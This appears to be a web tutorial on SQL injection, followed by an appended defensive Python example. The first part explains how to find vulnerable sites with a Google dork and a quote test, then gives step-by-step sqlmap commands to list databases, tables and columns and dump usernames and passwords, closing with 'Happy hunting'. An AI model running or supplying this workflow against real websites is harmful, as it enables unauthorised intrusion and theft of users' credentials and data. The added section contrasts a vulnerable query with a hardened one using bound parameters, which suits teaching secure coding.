Before you can break into a site's database, you have to find a website and check whether it is vulnerable. You can use Google dorks for this.
A. For example: inurl:index.php?id=1. Go through a few sites and put ' at the end of the selected URL: www.targetsite.com/index.php?id=1'. If it returns an error, then it is possibly vulnerable to SQL injection. The error may look like this:
Warning: include(include/.php) [function.include]: failed to open stream: No such file or directory in /index.php on line 38
B. Fire up sqlmap and enter the following commands:
- sqlmap -u targetsite.com/index.php?id=1 --dbs (retrieves all databases on the server)
- sqlmap -u targetsite.com/index.php?id=1 -D dbname --tables (retrieves all tables in dbname)
- sqlmap -u targetsite.com/index.php?id=1 -D dbname -T tablename --columns (retrieves the columns of tablename, such as id, username, password)
- sqlmap -u targetsite.com/index.php?id=1 -D dbname -T tablename -C columnname --dump
Then you will get the table along with the specified column names. Bingo! Happy hunting. Thank you.
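Why the quote test in step A produces an error, and the fix that makes it stop, shown as an added example that is not part of the original page. It uses Python's sqlite3 as a stand-in for the site's PHP and database; the table, the function names and the sample rows are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory data standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)", [(1, "Home"), (2, "About")])
    return db

def page_vulnerable(db, raw_id):
    """'Before': the id parameter is concatenated into the SQL text and
    database errors are echoed back to the visitor."""
    try:
        sql = "SELECT title FROM pages WHERE id = " + raw_id
        return 200, db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, "Warning: " + str(exc)  # error text reaches the response

def page_hardened(db, raw_id, log):
    """'After': strict integer check, bound parameter, generic error body."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        # A non-integer id is a useful monitoring signal; record it server-side.
        log.append("rejected non-integer id: %r" % raw_id)
        return 400, "Bad request"
    try:
        # The value is bound as data and can never become part of the SQL text.
        rows = db.execute(
            "SELECT title FROM pages WHERE id = ?", (int(raw_id),)
        ).fetchall()
    except sqlite3.Error:
        log.append("database error")
        return 500, "Internal error"
    return (200, rows) if rows else (404, "Not found")

if __name__ == "__main__":
    db, log = make_db(), []
    for value in ("1", "1'"):
        print(repr(value), page_vulnerable(db, value), page_hardened(db, value, log))
    print(log)
```

The hardened handler gives the same generic response for every malformed id, so the response carries no database error text, and the rejected values in the server-side log can be alerted on.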